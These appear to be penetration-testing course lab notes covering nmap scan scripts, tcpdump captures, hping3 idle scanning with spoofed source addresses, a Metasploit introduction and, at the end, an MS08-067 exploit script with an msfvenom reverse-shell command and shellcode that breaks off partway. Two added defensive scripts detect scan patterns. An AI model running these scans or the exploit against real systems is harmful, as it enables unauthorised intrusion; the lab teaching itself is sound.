18:40:31.826141 IP 200.200.200.3.46148 > 200.200.200.6.80: Flags [S], seq 3900203970, win 1024, options [mss 1460], length 0
18:40:31.826179 IP 200.200.200.6.80 > 200.200.200.3.46148: Flags [S.], seq 2354405363, ack 3900203971, win 29200, options [mss 1460], length 0
18:40:31.826420 IP 200.200.200.3.46148 > 200.200.200.6.80: Flags [R], seq 3900203971, win 0, length 0
18:40:32.086501 IP 200.200.200.3.64343 > 200.200.200.6.80: Flags [F], seq 2635841437, win 1024, length 0
18:40:32.195950 IP 200.200.200.3.64345 > 200.200.200.6.80: Flags [F], seq 2635710367, win 1024, length 0
18:40:32.545829 IP 200.200.200.3.39989 > 200.200.200.6.80: Flags [FPU], seq 2071201281, win 1024, urg 0, length 0
18:40:32.655240 IP 200.200.200.3.39991 > 200.200.200.6.80: Flags [FPU], seq 2071332355, win 1024, urg 0, length 0

Lab> Building a port-scanning script in shell

Save the port-scan traffic to a file and analyze it with Wireshark.
File extensions: pcap, pcapng

-w filename: the captured packets are written to filename

1. Write the source code
[root@kali ~]# vi ./nmap.sh 
#!/bin/sh

victimIP="200.200.200.6"
port=80

scanOption="-sT -sS -sF -sX -sN"

for option in $scanOption
do
    nmap $option -p $port $victimIP
done

[root@kali ~]# chmod 755 nmap.sh 

2. Monitor the packets
[root@victim3 ~]# tcpdump -i ens33 port 1 or 80 -w /var/www/html/totalCapture.pcap

3. Run the port-scan attack
[root@kali ~]# ./nmap.sh 

4. Save the packets
[root@victim3 ~]# tcpdump -i ens33 port 1 or 80 -w /var/www/html/totalCapture.pcap
tcpdump: listening on ens33, link-type EN10MB (Ethernet), capture size 262144 bytes
^C11 packets captured
11 packets received by filter
0 packets dropped by kernel

5. Download the packet file
On the host OS, download the captured packet file.
http://200.200.200.6/totalCapture.pcap

6. Analyze the packets
Run Wireshark and analyze the packets.

Lab> Building a port-scanning script in Python

1. Write the source code
[root@kali ~]# vi nmap.py 
#!/usr/bin/env python3

"""
-sT: TCP Connect Scan
-sS: TCP Stealth Scan
-sF: TCP FIN Scan
-sX: TCP X-MAS Scan
-sN: TCP NULL Scan
"""

import subprocess

victimIP = "200.200.200.6"
port = 80
scanOption = ['-sT', '-sS', '-sF', '-sX', '-sN']

# print(victimIP, port, scanOption)

for option in scanOption:
    # build the command as an argument list so no shell is involved
    scanCommand = ['nmap', option, '-p', str(port), victimIP]
    print(f'>>> {" ".join(scanCommand)} <<<')
    subprocess.run(scanCommand)
    print()
else:
    # the else branch of a for loop runs once the loop completes normally
    print(f'{victimIP}: port scan finished')

2. Monitor the packets
[root@victim3 ~]# tcpdump -i ens33 port 1 or 80 -nn

3. Run the port-scan attack
[root@kali ~]# ./nmap.py 

4. Check the packets
[root@victim3 ~]# tcpdump -i ens33 port 1 or 80 -nn

Lab> Idle scanning

Idle scanning scans the victim's ports by way of another victim host; it only works when no firewall is in the way.

Victim1: 200.200.200.4
Victim3: 200.200.200.6
Attacker: 200.200.200.3

>>> Network environment <<<

- Kali Linux (https://www.kali.org)
  Attacker: attacker.linuxmaster.net  200.200.200.3
- Victim1, Target1: WinXP (client)
  victim1.linuxmaster.net 200.200.200.4
- Victim2, Target2: Win7 (client)
  victim2.linuxmaster.net 200.200.200.5
- Victim3, Target3: CentOS 7 (server)
  victim3.linuxmaster.net 200.200.200.6
- Victim4, Target4: BeeBox (server)
  victim4.linuxmaster.net 200.200.200.7

   Attacker    Victim1     Victim2     Victim3     Victim4
    Kali        WinXP        Win7      CentOS7     bee-box
   +-----+     +-----+     +-----+     +-----+     +-----+
   |     |     |     |     |     |     |     |     |     |
   |     |     |     |     |     |     |     |     |     |
   +-----+     +-----+     +-----+     +-----+     +-----+
      |           |           |           |           |
------+-----------+-----------+-----------+-----------+-------
     .3          .4          .5          .6          .7

                       200.200.200.0/24



>>> Source code download reference <<<
It is written in C, so it is worth analyzing.
https://www.kali.org/tools/hping3/ ->  Source Code Repository
# vi /etc/resolv.conf 
nameserver 168.126.63.1

Download and analyze the C source code.
[root@kali ~]# mkdir hping3; cd hping3
[root@kali hping3]# apt -y install libpcap-dev
[root@kali hping3]# ln -s /usr/include/pcap-bpf.h /usr/include/net/bpf.h
[root@kali hping3]# git clone https://salsa.debian.org/debian/hping3.git .
[root@kali hping3]# ./configure
[root@kali hping3]# make  <-- errors occur; search Google to resolve them
[root@kali hping3]# cd

hping3 options
-S : set the SYN flag
-A : set the ACK flag
-p : destination port
-a : spoof the source IP (spoofing)
-r : id monitoring
-c : packet count

[root@kali ~]# hping3 --help
usage: hping3 host [options]
  -h  --help      show this help
  -v  --version   show version
  -c  --count     packet count
  -i  --interval  wait (uX for X microseconds, for example -i u1000)
      --fast      alias for -i u10000 (10 packets for second)
      --faster    alias for -i u1000 (100 packets for second)
      --flood	   sent packets as fast as possible. Don't show replies.
  -n  --numeric   numeric output
  -q  --quiet     quiet
  -I  --interface interface name (otherwise default routing interface)
  -V  --verbose   verbose mode
  -D  --debug     debugging info
  -z  --bind      bind ctrl+z to ttl           (default to dst port)
  -Z  --unbind    unbind ctrl+z
      --beep      beep for every matching packet received
Mode
  default mode     TCP
  -0  --rawip      RAW IP mode
  -1  --icmp       ICMP mode
  -2  --udp        UDP mode
  -8  --scan       SCAN mode.
                   Example: hping --scan 1-30,70-90 -S www.target.host
  -9  --listen     listen mode
IP
  -a  --spoof      spoof source address
  --rand-dest      random destionation address mode. see the man.
  --rand-source    random source address mode. see the man.
  -t  --ttl        ttl (default 64)
  -N  --id         id (default random)
  -W  --winid      use win* id byte ordering
  -r  --rel        relativize id field          (to estimate host traffic)
  -f  --frag       split packets in more frag.  (may pass weak acl)
  -x  --morefrag   set more fragments flag
  -y  --dontfrag   set don't fragment flag
  -g  --fragoff    set the fragment offset
  -m  --mtu        set virtual mtu, implies --frag if packet size > mtu
  -o  --tos        type of service (default 0x00), try --tos help
  -G  --rroute     includes RECORD_ROUTE option and display the route buffer
  --lsrr           loose source routing and record route
  --ssrr           strict source routing and record route
  -H  --ipproto    set the IP protocol field, only in RAW IP mode
ICMP
  -C  --icmptype   icmp type (default echo request)
  -K  --icmpcode   icmp code (default 0)
      --force-icmp send all icmp types (default send only supported types)
      --icmp-gw    set gateway address for ICMP redirect (default 0.0.0.0)
      --icmp-ts    Alias for --icmp --icmptype 13 (ICMP timestamp)
      --icmp-addr  Alias for --icmp --icmptype 17 (ICMP address subnet mask)
      --icmp-help  display help for others icmp options
UDP/TCP
  -s  --baseport   base source port             (default random)
  -p  --destport   [+][+]<port> destination port(default 0) ctrl+z inc/dec
  -k  --keep       keep still source port
  -w  --win        winsize (default 64)
  -O  --tcpoff     set fake tcp data offset     (instead of tcphdrlen / 4)
  -Q  --seqnum     shows only tcp sequence number
  -b  --badcksum   (try to) send packets with a bad IP checksum
                   many systems will fix the IP checksum sending the packet
                   so you'll get bad UDP/TCP checksum instead.
  -M  --setseq     set TCP sequence number
  -L  --setack     set TCP ack
  -F  --fin        set FIN flag
  -S  --syn        set SYN flag
  -R  --rst        set RST flag
  -P  --push       set PUSH flag
  -A  --ack        set ACK flag
  -U  --urg        set URG flag
  -X  --xmas       set X unused flag (0x40)
  -Y  --ymas       set Y unused flag (0x80)
  --tcpexitcode    use last tcp->th_flags as exit code
  --tcp-mss        enable the TCP MSS option with the given value
  --tcp-timestamp  enable the TCP timestamp option to guess the HZ/uptime
Common
  -d  --data       data size                    (default is 0)
  -E  --file       data from file
  -e  --sign       add 'signature'
  -j  --dump       dump packets in hex
  -J  --print      dump printable characters
  -B  --safe       enable 'safe' protocol
  -u  --end        tell you when --file reached EOF and prevent rewind
  -T  --traceroute traceroute mode              (implies --bind and --ttl 1)
  --tr-stop        Exit when receive the first not ICMP in traceroute mode
  --tr-keep-ttl    Keep the source TTL fixed, useful to monitor just one hop
  --tr-no-rtt	    Don't calculate/show RTT information in traceroute mode
ARS packet description (new, unstable)
  --apd-send       Send the packet described with APD (see docs/APD.txt)


Basic TCP communication
If no port is specified, the request is sent to destination port 0.
Default flags: Null (the request is sent with no flags set)

1. hping3 test
hping3 warm-up
[root@victim3 ~]# systemctl stop firewalld
[root@victim3 ~]# iptables -F

Monitor the packets arriving on port 80.
-i ens33: interface ens33
port 80: port 80
-nn: numeric output; the first n prints IP addresses numerically, the second n prints port numbers numerically
[root@victim3 ~]# tcpdump -i ens33 port 80 -nn

-c 10: count of 10 packets
-S: SYN
-p 80: port 80
200.200.200.6: target
[root@kali ~]# hping3 -c 10 -S -p 80 200.200.200.6
HPING 200.200.200.6 (eth0 200.200.200.6): S set, 40 headers + 0 data bytes
len=46 ip=200.200.200.6 ttl=64 DF id=0 sport=80 flags=SA seq=0 win=29200 rtt=3.9 ms
len=46 ip=200.200.200.6 ttl=64 DF id=0 sport=80 flags=SA seq=1 win=29200 rtt=6.9 ms
len=46 ip=200.200.200.6 ttl=64 DF id=0 sport=80 flags=SA seq=2 win=29200 rtt=11.4 ms
len=46 ip=200.200.200.6 ttl=64 DF id=0 sport=80 flags=SA seq=3 win=29200 rtt=6.9 ms
len=46 ip=200.200.200.6 ttl=64 DF id=0 sport=80 flags=SA seq=4 win=29200 rtt=0.9 ms
len=46 ip=200.200.200.6 ttl=64 DF id=0 sport=80 flags=SA seq=5 win=29200 rtt=4.0 ms
len=46 ip=200.200.200.6 ttl=64 DF id=0 sport=80 flags=SA seq=6 win=29200 rtt=7.2 ms
len=46 ip=200.200.200.6 ttl=64 DF id=0 sport=80 flags=SA seq=7 win=29200 rtt=3.0 ms
len=46 ip=200.200.200.6 ttl=64 DF id=0 sport=80 flags=SA seq=8 win=29200 rtt=5.2 ms
len=46 ip=200.200.200.6 ttl=64 DF id=0 sport=80 flags=SA seq=9 win=29200 rtt=12.0 ms

--- 200.200.200.6 hping statistic ---
10 packets transmitted, 10 packets received, 0% packet loss
round-trip min/avg/max = 0.9/6.1/12.0 ms

2. Idle scan

Step 1: monitoring the IP ID
-r: relative id (used for the idle scan)

With the -r option the packets are sent with no flags set, like a NULL scan.
[root@kali hping3]# hping3 -r 200.200.200.6
[root@victim3 ~]# tcpdump -i ens33 not port 22 -nn 
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on ens33, link-type EN10MB (Ethernet), capture size 262144 bytes
22:39:23.987507 IP 200.200.200.3.2990 > 200.200.200.6.0: Flags [none], win 512, length 0
22:39:23.987545 IP 200.200.200.6.0 > 200.200.200.3.2990: Flags [R.], seq 0, ack 1912185696, win 0, length 0
22:39:25.071691 IP 200.200.200.3.2991 > 200.200.200.6.0: Flags [none], win 512, length 0
22:39:25.071783 IP 200.200.200.6.0 > 200.200.200.3.2991: Flags [R.], seq 0, ack 1165739149, win 0, length 0
22:39:26.155844 IP 200.200.200.3.2992 > 200.200.200.6.0: Flags [none], win 512, length 0
22:39:26.155889 IP 200.200.200.6.0 > 200.200.200.3.2992: Flags [R.], seq 0, ack 255718478, win 0, length 0
^C
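From the defender's side, the captures above (the SYN probes from hping3 -S and the flag-less probes from hping3 -r) have recognisable shapes in tcpdump's text output. The following Python script is an added example, not part of the original notes: it groups tcpdump lines into flows and labels each one as a NULL probe (no flags set), a half-open SYN probe (SYN answered with SYN/ACK and never acknowledged), a connect probe (handshake completed, then reset without sending data, the nmap -sT pattern), a SYN to a closed port, or a normal connection. The capture lines are constructed samples modelled on the format shown in this lab, and the function names (classify_flows, probes_per_source) are my own.

```python
import re
from collections import defaultdict

# Constructed sample in tcpdump's text format, modelled on the captures
# shown in this lab (not a real capture from these notes).
SAMPLE_CAPTURE = """\
18:04:42.002757 IP 200.200.200.3.53946 > 200.200.200.6.80: Flags [S], seq 1703896547, win 64240, length 0
18:04:42.002787 IP 200.200.200.6.80 > 200.200.200.3.53946: Flags [S.], seq 4262865332, ack 1703896548, win 28960, length 0
18:04:42.003036 IP 200.200.200.3.53946 > 200.200.200.6.80: Flags [.], ack 1, win 502, length 0
18:04:42.003098 IP 200.200.200.3.53946 > 200.200.200.6.80: Flags [R.], seq 1, ack 1, win 502, length 0
18:05:10.100000 IP 200.200.200.3.1200 > 200.200.200.6.80: Flags [S], seq 10, win 512, length 0
18:05:10.100100 IP 200.200.200.6.80 > 200.200.200.3.1200: Flags [S.], seq 20, ack 11, win 28960, length 0
18:05:10.100200 IP 200.200.200.3.1200 > 200.200.200.6.80: Flags [R], seq 11, win 0, length 0
18:05:30.000000 IP 200.200.200.3.1300 > 200.200.200.6.8000: Flags [S], seq 1, win 512, length 0
18:05:30.000100 IP 200.200.200.6.8000 > 200.200.200.3.1300: Flags [R.], seq 0, ack 2, win 0, length 0
22:39:23.987507 IP 200.200.200.3.2990 > 200.200.200.6.0: Flags [none], win 512, length 0
22:39:23.987545 IP 200.200.200.6.0 > 200.200.200.3.2990: Flags [R.], seq 0, ack 1912185696, win 0, length 0
18:06:00.000000 IP 200.200.200.9.40000 > 200.200.200.6.80: Flags [S], seq 1, win 64240, length 0
18:06:00.000100 IP 200.200.200.6.80 > 200.200.200.9.40000: Flags [S.], seq 2, ack 2, win 28960, length 0
18:06:00.000200 IP 200.200.200.9.40000 > 200.200.200.6.80: Flags [.], ack 1, win 502, length 0
18:06:00.000300 IP 200.200.200.9.40000 > 200.200.200.6.80: Flags [P.], seq 1:80, ack 1, win 502, length 79
"""

# One tcpdump TCP line: timestamp, src.port > dst.port, flags, ..., length N
LINE_RE = re.compile(
    r'^(?P<ts>\S+) IP (?P<src>\d+(?:\.\d+){3})\.(?P<sport>\d+) > '
    r'(?P<dst>\d+(?:\.\d+){3})\.(?P<dport>\d+): Flags \[(?P<flags>[^\]]*)\].*?length (?P<length>\d+)')


def parse_line(line):
    """Return the fields of one tcpdump TCP line, or None for any other line."""
    m = LINE_RE.match(line)
    if not m:
        return None
    return {'src': m['src'], 'sport': int(m['sport']),
            'dst': m['dst'], 'dport': int(m['dport']),
            'flags': m['flags'], 'length': int(m['length'])}


def label_flow(state):
    """Label one flow from the flag sequences seen in each direction."""
    c, s = state['client_flags'], state['server_flags']
    if 'none' in c:
        return 'NULL probe (no TCP flags)'
    if 'S' in c and 'S.' in s and '.' not in c:
        return 'half-open SYN probe'
    if 'S' in c and '.' in c and state['client_bytes'] == 0 and any(f.startswith('R') for f in c):
        return 'connect probe (handshake then reset, no data)'
    if 'S' in c and 'R.' in s:
        return 'SYN to closed port'
    return 'normal'


def classify_flows(capture_text):
    """Group packets into flows keyed by the side that sent the first packet
    (the client) and label each flow."""
    flows = {}
    for line in capture_text.splitlines():
        pkt = parse_line(line)
        if pkt is None:
            continue
        fwd = (pkt['src'], pkt['sport'], pkt['dst'], pkt['dport'])
        rev = (pkt['dst'], pkt['dport'], pkt['src'], pkt['sport'])
        if fwd in flows:
            state, side = flows[fwd], 'client'
        elif rev in flows:
            state, side = flows[rev], 'server'
        else:
            state = flows[fwd] = {'client_flags': [], 'server_flags': [], 'client_bytes': 0}
            side = 'client'
        state[side + '_flags'].append(pkt['flags'])
        if side == 'client':
            state['client_bytes'] += pkt['length']
    return {flow: label_flow(state) for flow, state in flows.items()}


def probes_per_source(labels):
    """Sorted list of probed server ports per source address (non-normal flows only)."""
    ports = defaultdict(set)
    for (client, _cport, _server, sport), label in labels.items():
        if label != 'normal':
            ports[client].add(sport)
    return {src: sorted(p) for src, p in ports.items()}


if __name__ == '__main__':
    labels = classify_flows(SAMPLE_CAPTURE)
    for flow, label in labels.items():
        print('%s:%d -> %s:%d  %s' % (flow + (label,)))
    print(probes_per_source(labels))
```

The direction of the first packet decides who is the client, so a single pass over the capture is enough. A real connection that sends data after the handshake (the last flow in the sample) is left as normal; the probes are all flows that never carry a payload, and the per-source port list is the quick view of how many ports one address touched.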

Turn the Windows XP firewall off.
cmd > firewall.cpl > Off

[root@kali ~]# hping3 -r 200.200.200.4
HPING 200.200.200.4 (eth0 200.200.200.4): NO FLAGS are set, 40 headers + 0 data bytes
len=46 ip=200.200.200.4 ttl=128 id=949 sport=0 flags=RA seq=0 win=0 rtt=2.9 ms
len=46 ip=200.200.200.4 ttl=128 id=+1 sport=0 flags=RA seq=1 win=0 rtt=2.4 ms
len=46 ip=200.200.200.4 ttl=128 id=+1 sport=0 flags=RA seq=2 win=0 rtt=6.8 ms
len=46 ip=200.200.200.4 ttl=128 id=+1 sport=0 flags=RA seq=3 win=0 rtt=5.8 ms
 :
 :(omitted)


Step 2: sending a spoofed packet (to open port 80)
hping3 options
-S : set the SYN flag
-A : set the ACK flag
-p : destination port
-a : spoof the source IP address
-r : monitor the IP ID (relative id)
-c : packet count

[root@victim3 ~]# systemctl start httpd

[root@kali ~]# hping3 -p 80 -S -c 1 -a 200.200.200.4 200.200.200.6



Victim3 answers the spoofed SYN with a SYN/ACK to 200.200.200.4, which replies with a RST; that reply consumes one more IP ID, so the next probe shows +2 instead of +1.
[root@kali ~]# hping3 -r 200.200.200.4
  :
  :(omitted)
len=46 ip=200.200.200.4 ttl=128 id=+1 sport=0 flags=RA seq=553 win=0 rtt=7.5 ms
len=46 ip=200.200.200.4 ttl=128 id=+1 sport=0 flags=RA seq=554 win=0 rtt=2.9 ms
len=46 ip=200.200.200.4 ttl=128 id=+1 sport=0 flags=RA seq=555 win=0 rtt=1.9 ms
len=46 ip=200.200.200.4 ttl=128 id=+1 sport=0 flags=RA seq=556 win=0 rtt=5.0 ms
len=46 ip=200.200.200.4 ttl=128 id=+2 sport=0 flags=RA seq=612 win=0 rtt=3.3 ms  <-- +2 
len=46 ip=200.200.200.4 ttl=128 id=+1 sport=0 flags=RA seq=613 win=0 rtt=11.1 ms

Confirm with nmap that port 80 is open.
[root@kali ~]# nmap -sT -p 80 200.200.200.6
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-04 20:54 EDT
Nmap scan report for 200.200.200.6
Host is up (0.00037s latency).

PORT   STATE SERVICE
80/tcp open  http
MAC Address: 00:0C:29:3D:BF:69 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.47 seconds

Step 3: sending a spoofed packet (to closed port 8000)
[root@kali ~]# nmap -sT -p 8000 200.200.200.6
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-04 21:08 EDT
Nmap scan report for 200.200.200.6
Host is up (0.00052s latency).

PORT     STATE  SERVICE
8000/tcp closed http-alt
MAC Address: 00:0C:29:3D:BF:69 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.47 seconds

[root@kali ~]# hping3 -p 8000 -S -c 10 -a 200.200.200.4 200.200.200.6
HPING 200.200.200.6 (eth0 200.200.200.6): S set, 40 headers + 0 data bytes

--- 200.200.200.6 hping statistic ---
10 packets transmitted, 0 packets received, 100% packet loss
round-trip min/avg/max = 0.0/0.0/0.0 ms

When the ID keeps advancing by only +1, the port on victim3 is closed: victim3 answers the spoofed SYN with a RST, and 200.200.200.4 sends nothing in reply to a RST, so no extra IP ID is consumed.
[root@kali ~]# hping3 -r 200.200.200.4
  :
  :(omitted)
len=46 ip=200.200.200.4 ttl=128 id=+1 sport=0 flags=RA seq=1352 win=0 rtt=4.8 ms
len=46 ip=200.200.200.4 ttl=128 id=+1 sport=0 flags=RA seq=1353 win=0 rtt=3.8 ms
len=46 ip=200.200.200.4 ttl=128 id=+1 sport=0 flags=RA seq=1354 win=0 rtt=3.5 ms
len=46 ip=200.200.200.4 ttl=128 id=+1 sport=0 flags=RA seq=1355 win=0 rtt=10.5 ms
len=46 ip=200.200.200.4 ttl=128 id=+1 sport=0 flags=RA seq=1356 win=0 rtt=9.2 ms
len=46 ip=200.200.200.4 ttl=128 id=+1 sport=0 flags=RA seq=1357 win=0 rtt=8.7 ms
len=46 ip=200.200.200.4 ttl=128 id=+1 sport=0 flags=RA seq=1358 win=0 rtt=8.2 ms
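The three steps above rest on one observation: the zombie's IP ID counter is global and sequential, so every packet it sends to anyone shows up as an extra increment in the hping3 -r output. The security-relevant point for a defender is that any host with such a counter leaks its traffic volume to anyone who can reach it, which is exactly what makes it usable as an idle-scan zombie; modern operating systems randomise the IP ID for that reason. The following Python script is an added example, not part of the original notes: it parses hping3 -r output, reconstructs the absolute IDs from the relative increments, reports the probes during which the host sent traffic elsewhere (the +2 lines), and classifies the host's IP ID behaviour. The sample lines are constructed from the values shown in this lab plus a hypothetical host with randomised IDs; the function names are my own.

```python
import re

# Constructed sample of hping3 -r output, modelled on the lines in this lab.
# The first reply shows an absolute id; later replies show the increment
# since the previous reply.
ZOMBIE_SAMPLE = """\
HPING 200.200.200.4 (eth0 200.200.200.4): NO FLAGS are set, 40 headers + 0 data bytes
len=46 ip=200.200.200.4 ttl=128 id=949 sport=0 flags=RA seq=0 win=0 rtt=2.9 ms
len=46 ip=200.200.200.4 ttl=128 id=+1 sport=0 flags=RA seq=1 win=0 rtt=2.4 ms
len=46 ip=200.200.200.4 ttl=128 id=+1 sport=0 flags=RA seq=2 win=0 rtt=6.8 ms
len=46 ip=200.200.200.4 ttl=128 id=+2 sport=0 flags=RA seq=3 win=0 rtt=3.3 ms
len=46 ip=200.200.200.4 ttl=128 id=+1 sport=0 flags=RA seq=4 win=0 rtt=11.1 ms
"""

# Constructed sample for a hypothetical host whose IP ID is randomised.
RANDOM_SAMPLE = """\
len=46 ip=10.0.0.5 ttl=64 id=19487 sport=0 flags=RA seq=0 win=0 rtt=1.0 ms
len=46 ip=10.0.0.5 ttl=64 id=+23891 sport=0 flags=RA seq=1 win=0 rtt=1.1 ms
len=46 ip=10.0.0.5 ttl=64 id=+41002 sport=0 flags=RA seq=2 win=0 rtt=0.9 ms
"""

# id=949 (absolute) or id=+1 (relative), followed later by seq=N
REPLY_RE = re.compile(r'\bid=(?P<id>[+-]?\d+)\b.*\bseq=(?P<seq>\d+)\b')


def parse_hping_ids(text):
    """Return [(seq, absolute_id, increment)]; increment is None for the first reply."""
    records = []
    last_id = None
    for line in text.splitlines():
        m = REPLY_RE.search(line)
        if not m:
            continue
        token, seq = m['id'], int(m['seq'])
        if token[0] in '+-' and last_id is not None:
            inc = int(token)
            abs_id = (last_id + inc) % 65536          # the IP ID is a 16-bit field
        else:
            abs_id = int(token.lstrip('+-'))
            inc = None if last_id is None else (abs_id - last_id) % 65536
        records.append((seq, abs_id, inc))
        last_id = abs_id
    return records


def extra_traffic_probes(records):
    """Sequence numbers of probes whose id advanced by more than 1, i.e. the
    host sent at least one packet to someone else between two replies."""
    return [seq for seq, _id, inc in records if inc is not None and inc > 1]


def classify_ipid(records):
    """Classify the host's IP ID behaviour from the observed increments."""
    incs = [inc for _seq, _id, inc in records if inc is not None]
    if len(incs) < 2:
        return 'insufficient data'
    if all(inc == 1 for inc in incs):
        return 'sequential (predictable, host idle)'
    if all(1 <= inc <= 16 for inc in incs):
        return 'sequential (predictable, other traffic present)'
    return 'non-sequential (randomised or per-destination counter)'


if __name__ == '__main__':
    for name, sample in (('zombie', ZOMBIE_SAMPLE), ('random', RANDOM_SAMPLE)):
        recs = parse_hping_ids(sample)
        print(name, classify_ipid(recs), 'extra traffic at seq', extra_traffic_probes(recs))
```

The threshold of 16 in classify_ipid is an assumed cut-off for "sequential with some background traffic"; a busy host with a global counter will show larger but still small jumps, while a randomised counter jumps by thousands. For the zombie sample the function reports seq 3 as the probe during which the host sent one extra packet, which is the +2 line the notes point at.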

Step 4: Wireshark analysis
Capture the packets on victim1 with Wireshark and analyse them.
Because a lot of packets appear, set the display filter to ip.host == 200.200.200.4 and look only at those.
Check the id value in the Identification field of the IP header.




##############
## metasploit 
##############

[root@kali ~]# msfconsole 

                                   
               .;lxO0KXXXK0Oxl:.
           ,o0WMMMMMMMMMMMMMMMMMMKd,
        'xNMMMMMMMMMMMMMMMMMMMMMMMMMWx,
      :KMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMK:
    .KMMMMMMMMMMMMMMMWNNNWMMMMMMMMMMMMMMMX,
   lWMMMMMMMMMMMXd:..     ..;dKMMMMMMMMMMMMo
  xMMMMMMMMMMWd.               .oNMMMMMMMMMMk
 oMMMMMMMMMMx.                    dMMMMMMMMMMx
.WMMMMMMMMM:                       :MMMMMMMMMM,
xMMMMMMMMMo                         lMMMMMMMMMO
NMMMMMMMMW                    ,cccccoMMMMMMMMMWlccccc;
MMMMMMMMMX                     ;KMMMMMMMMMMMMMMMMMMX:
NMMMMMMMMW.                      ;KMMMMMMMMMMMMMMX:
xMMMMMMMMMd                        ,0MMMMMMMMMMK;
.WMMMMMMMMMc                         'OMMMMMM0,
 lMMMMMMMMMMk.                         .kMMO'
  dMMMMMMMMMMWd'                         ..
   cWMMMMMMMMMMMNxc'.                ##########
    .0MMMMMMMMMMMMMMMMWc            #+#    #+#
      ;0MMMMMMMMMMMMMMMo.          +:+
        .dNMMMMMMMMMMMMo          +#++:++#+
           'oOWMMMMMMMMo                +:+
               .,cdkO0K;        :+:    :+:                                
                                :::::::+:
                      Metasploit

       =[ metasploit v6.2.9-dev                           ]
+ -- --=[ 2230 exploits - 1177 auxiliary - 398 post       ]
+ -- --=[ 867 payloads - 45 encoders - 11 nops            ]
+ -- --=[ 9 evasion                                       ]

Metasploit tip: View advanced module options with 
advanced

msf6 > quit

[root@kali ~]# msfconsole --help
Usage: msfconsole [options]

Common options:
    -E, --environment ENVIRONMENT    Set Rails environment, defaults to RAIL_ENV environment variable or 'production'

Database options:
    -M, --migration-path DIRECTORY   Specify a directory containing additional DB migrations
    -n, --no-database                Disable database support
    -y, --yaml PATH                  Specify a YAML file containing database settings

Framework options:
    -c FILE                          Load the specified configuration file
    -v, -V, --version                Show version

Module options:
        --defer-module-loads         Defer module loading unless explicitly asked
    -m, --module-path DIRECTORY      Load an additional module path

Console options:
    -a, --ask                        Ask before exiting Metasploit or accept 'exit -y'
    -H, --history-file FILE          Save command history to the specified file
    -l, --logger STRING              Specify a logger to use (TimestampColorlessFlatfile, Flatfile, StdoutWithoutTimestamps, Stdout, Stderr)
        --[no-]readline
    -L, --real-readline              Use the system Readline library instead of RbReadline
    -o, --output FILE                Output to the specified file
    -p, --plugin PLUGIN              Load a plugin on startup
    -q, --quiet                      Do not print the banner on startup
    -r, --resource FILE              Execute the specified resource file (- for stdin)
    -x, --execute-command COMMAND    Execute the specified console commands (use ; for multiples)
    -h, --help                       Show this message


[root@kali ~]# msfconsole

       =[ metasploit v6.2.26-dev                          ]
+ -- --=[ 2264 exploits - 1189 auxiliary - 404 post       ]
+ -- --=[ 951 payloads - 45 encoders - 11 nops            ]
+ -- --=[ 9 evasion                                       ]

Metasploit tip: Enable HTTP request and response logging 
with set HttpTrace true
Metasploit Documentation: https://docs.metasploit.com/


msf6 > help
msf6 > show exploits
msf6 > show payloads
msf6 > help search
msf6 > help info

Metasploit pricing
http://www.softwarecatalog.co.kr/src/Item/Itemmaster.aspx?Serial=8004

The usual route of North Korean cyber attacks: what exactly is the PMS vulnerability?
https://www.boannews.com/media/view.asp?idx=57389

Why is 'patch management' the core of enterprise security?
https://www.ahnlab.com/kr/site/securityinfo/secunews/secuNewsView.do?menu_dist=2&seq=24718

MS updates
- Regular updates (the second Tuesday of every month; Wednesday in Korean time)
- Out-of-band updates (emergency updates, released as soon as a vulnerability appears)

Google: search for "Windows update boot failure"

Lab> MS08-067

Microsoft Security Bulletin MS08-067 - Critical

CVE-2008-4250

References: 
https://docs.microsoft.com/ko-kr/security-updates/SecurityBulletins/2008/MS08-067
https://support.microsoft.com/ko-kr/topic/ms08-067-서버-서비스의-취약성으로-인한-원격-코드-실행-문제-ac7878fc-be69-7143-472d-2507a179cd15


CVE
https://nordvpn.com/ko/blog/cve-explained/

What is a CVE?
https://www.boannews.com/media/view.asp?idx=47656

https://www.exploit-db.com/exploits/40279


[root@kali ~]# vi MS08-067.py
"""
File name: MS08-067.py
Description: exploit code for the MS08-067 vulnerability
Run it with Python 2.
Reference: https://www.exploit-db.com/exploits/40279
"""

import struct
import time
import sys

from threading import Thread    #Thread is imported incase you would like to modify
try:
    from impacket import smb
    from impacket import uuid
    from impacket import dcerpc
    from impacket.dcerpc.v5 import transport

except ImportError, _:
    print 'Install the following library to make this script work'
    print 'Impacket : http://oss.coresecurity.com/projects/impacket.html'
    print 'PyCrypto : http://www.amk.ca/python/code/crypto.html'
    sys.exit(1)

print '#######################################################################'
print '#   MS08-067 Exploit'
print '#   This is a modified verion of Debasis Mohanty\'s code (https://www.exploit-db.com/exploits/7132/).'
print '#   The return addresses and the ROP parts are ported from metasploit module exploit/windows/smb/ms08_067_netapi'
print '#######################################################################\n'

#Reverse TCP shellcode from metasploit; port 443 IP 192.168.40.103; badchars \x00\x0a\x0d\x5c\x5f\x2f\x2e\x40;
#Make sure there are enough nops at the begining for the decoder to work. Payload size: 380 bytes (nopsleps are not included)
#EXITFUNC=thread Important!
#msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.30.77 LPORT=443  EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f python
shellcode="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
shellcode="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
shellcode+="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
shellcode += "\x2b\xc9\x83\xe9\xa7\xe8\xff\xff\xff\xff\xc0\x5e\x81"
shellcode += "\x76\x0e\xb7\xdd\x9e\xe0\x83\xee\xfc\xe2\xf4\x4b\x35"
shellcode += "\x1c\xe0\xb7\xdd\xfe\x69\x52\xec\x5e\x84\x3c\x8d\xae"
shellcode += "\x6b\xe5\xd1\x15\xb2\xa3\x56\xec\xc8\xb8\x6a\xd4\xc6"
shellcode += "\x86\x22\x32\xdc\xd6\xa1\x9c\xcc\x97\x1c\x51\xed\xb6"
shellcode += "\x1a\x7c\x12\xe5\x8a\x15\xb2\xa7\x56\xd4\xdc\x3c\x91"
